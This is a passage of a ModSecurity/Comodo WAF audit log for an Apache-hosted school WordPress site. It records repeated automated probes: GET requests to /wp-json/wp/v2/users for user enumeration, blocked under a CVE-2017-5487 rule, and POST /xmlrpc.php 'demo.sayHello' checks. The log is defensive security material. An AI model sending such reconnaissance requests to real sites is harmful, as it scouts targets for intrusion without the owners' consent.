Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746313916045928 3208 (- - -) Stopwatch2: 1746313916045928 3208; combined=1425, p1=490, p2=904, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3e36265-Z-- --02360220-A-- [04/May/2025:06:12:01 +0700] aBaiwechPF6irSergtv8ewAAANE 103.236.140.4 33908 103.236.140.4 8181 --02360220-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02360220-C-- demo.sayHello --02360220-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02360220-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746313921957914 6581 (- - -) Stopwatch2: 1746313921957914 6581; combined=4782, p1=635, p2=3893, p3=38, p4=43, p5=102, sr=85, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02360220-Z-- --8331d315-A-- [04/May/2025:06:14:04 +0700] aBajPOchPF6irSergtv8fAAAANA 103.236.140.4 33918 103.236.140.4 8181 --8331d315-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8331d315-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8331d315-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314044139908 3390 (- - -) Stopwatch2: 1746314044139908 3390; combined=1446, p1=477, p2=938, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8331d315-Z-- --567b176c-A-- [04/May/2025:06:14:08 +0700] aBajQNsVQyl9V2B8Pt-vxAAAAEU 103.236.140.4 33922 103.236.140.4 8181 --567b176c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --567b176c-C-- demo.sayHello --567b176c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --567b176c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314048987300 5340 (- - -) Stopwatch2: 1746314048987300 5340; combined=4002, p1=496, p2=3294, p3=30, p4=30, p5=90, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --567b176c-Z-- --31bf8641-A-- [04/May/2025:06:14:50 +0700] aBajatsVQyl9V2B8Pt-vxQAAAEc 103.236.140.4 33930 103.236.140.4 8181 --31bf8641-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --31bf8641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31bf8641-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314090085806 3430 (- - -) Stopwatch2: 1746314090085806 3430; combined=1494, p1=535, p2=928, p3=0, p4=0, p5=31, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31bf8641-Z-- --55a94322-A-- [04/May/2025:06:14:55 +0700] aBajb_nZiHJYHUAF8QfblQAAAAQ 103.236.140.4 33934 103.236.140.4 8181 --55a94322-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55a94322-C-- demo.sayHello --55a94322-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55a94322-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314095742759 6451 (- - -) Stopwatch2: 1746314095742759 6451; combined=4660, p1=636, p2=3774, p3=40, p4=39, p5=100, sr=119, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55a94322-Z-- --ee13a11c-A-- [04/May/2025:06:15:14 +0700] aBajgtsVQyl9V2B8Pt-vxwAAAEo 103.236.140.4 33938 103.236.140.4 8181 --ee13a11c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ee13a11c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee13a11c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314114158409 3396 (- - -) Stopwatch2: 1746314114158409 3396; combined=1453, p1=464, p2=956, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee13a11c-Z-- --08cdcb3b-A-- [04/May/2025:06:15:23 +0700] aBaji9sVQyl9V2B8Pt-vyAAAAEw 103.236.140.4 33942 103.236.140.4 8181 --08cdcb3b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.91 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --08cdcb3b-C-- demo.sayHello --08cdcb3b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --08cdcb3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314123460262 5703 (- - -) Stopwatch2: 1746314123460262 5703; combined=4235, p1=499, p2=3526, p3=25, p4=26, p5=93, sr=69, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08cdcb3b-Z-- --8703370d-A-- [04/May/2025:06:15:54 +0700] aBajqtsVQyl9V2B8Pt-vzAAAAFI 103.236.140.4 33952 103.236.140.4 8181 --8703370d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8703370d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8703370d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314154198843 3492 (- - -) Stopwatch2: 1746314154198843 3492; combined=1564, p1=522, p2=1010, p3=0, p4=0, p5=31, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8703370d-Z-- --71942c67-A-- [04/May/2025:06:16:01 +0700] aBajsWJEE9ao5dcyYWnuLgAAAIg 103.236.140.4 33956 103.236.140.4 8181 --71942c67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71942c67-C-- demo.sayHello --71942c67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71942c67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314161912694 6568 (- - -) Stopwatch2: 1746314161912694 6568; combined=4877, p1=635, p2=3958, p3=45, p4=53, p5=113, sr=77, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71942c67-Z-- --7b90577e-A-- [04/May/2025:06:16:26 +0700] aBajytsVQyl9V2B8Pt-v0AAAAFY 103.236.140.4 33962 103.236.140.4 8181 --7b90577e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7b90577e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b90577e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314186800781 3482 (- - -) Stopwatch2: 1746314186800781 3482; combined=1526, p1=532, p2=962, p3=0, p4=0, p5=32, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b90577e-Z-- --8c29d408-A-- [04/May/2025:06:16:37 +0700] aBaj1dsVQyl9V2B8Pt-v0gAAAFc 103.236.140.4 33966 103.236.140.4 8181 --8c29d408-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8c29d408-C-- demo.sayHello --8c29d408-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c29d408-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314197327757 5332 (- - -) Stopwatch2: 1746314197327757 5332; combined=3991, p1=537, p2=3243, p3=28, p4=30, p5=90, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c29d408-Z-- --6ae6135a-A-- [04/May/2025:06:16:42 +0700] aBaj2tsVQyl9V2B8Pt-v1AAAAEM 103.236.140.4 33970 103.236.140.4 8181 --6ae6135a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6ae6135a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ae6135a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314202487851 1951 (- - -) Stopwatch2: 1746314202487851 1951; combined=951, p1=313, p2=612, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ae6135a-Z-- --a999df18-A-- [04/May/2025:06:17:31 +0700] aBakC_nZiHJYHUAF8QfbmAAAAAo 103.236.140.4 33990 103.236.140.4 8181 --a999df18-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a999df18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a999df18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314251744915 2808 (- - -) Stopwatch2: 1746314251744915 2808; combined=1401, p1=462, p2=907, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a999df18-Z-- --87eeba7d-A-- [04/May/2025:06:17:38 +0700] aBakEmJEE9ao5dcyYWnuMAAAAIs 103.236.140.4 33994 103.236.140.4 8181 --87eeba7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87eeba7d-C-- demo.sayHello --87eeba7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87eeba7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314258323389 5901 (- - -) Stopwatch2: 1746314258323389 5901; combined=4368, p1=541, p2=3598, p3=38, p4=37, p5=93, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87eeba7d-Z-- --b91b2b59-A-- [04/May/2025:06:17:55 +0700] aBakI_nZiHJYHUAF8QfbmgAAAAw 103.236.140.4 33998 103.236.140.4 8181 --b91b2b59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b91b2b59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b91b2b59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746314275312062 3516 (- - -) Stopwatch2: 1746314275312062 3516; combined=1539, p1=497, p2=943, p3=0, p4=0, p5=99, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b91b2b59-Z-- --8db4ad61-A-- [04/May/2025:06:18:01 +0700] aBakKdsVQyl9V2B8Pt-v2wAAAEw 103.236.140.4 34002 103.236.140.4 8181 --8db4ad61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8db4ad61-C-- demo.sayHello --8db4ad61-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8db4ad61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746314281257607 5744 (- - -) Stopwatch2: 1746314281257607 5744; combined=4194, p1=492, p2=3438, p3=28, p4=30, p5=121, sr=69, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8db4ad61-Z-- --90902958-A-- [04/May/2025:06:18:47 +0700] aBakV-chPF6irSergtv8fgAAANM 103.236.140.4 34008 103.236.140.4 8181 --90902958-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90902958-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90902958-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability 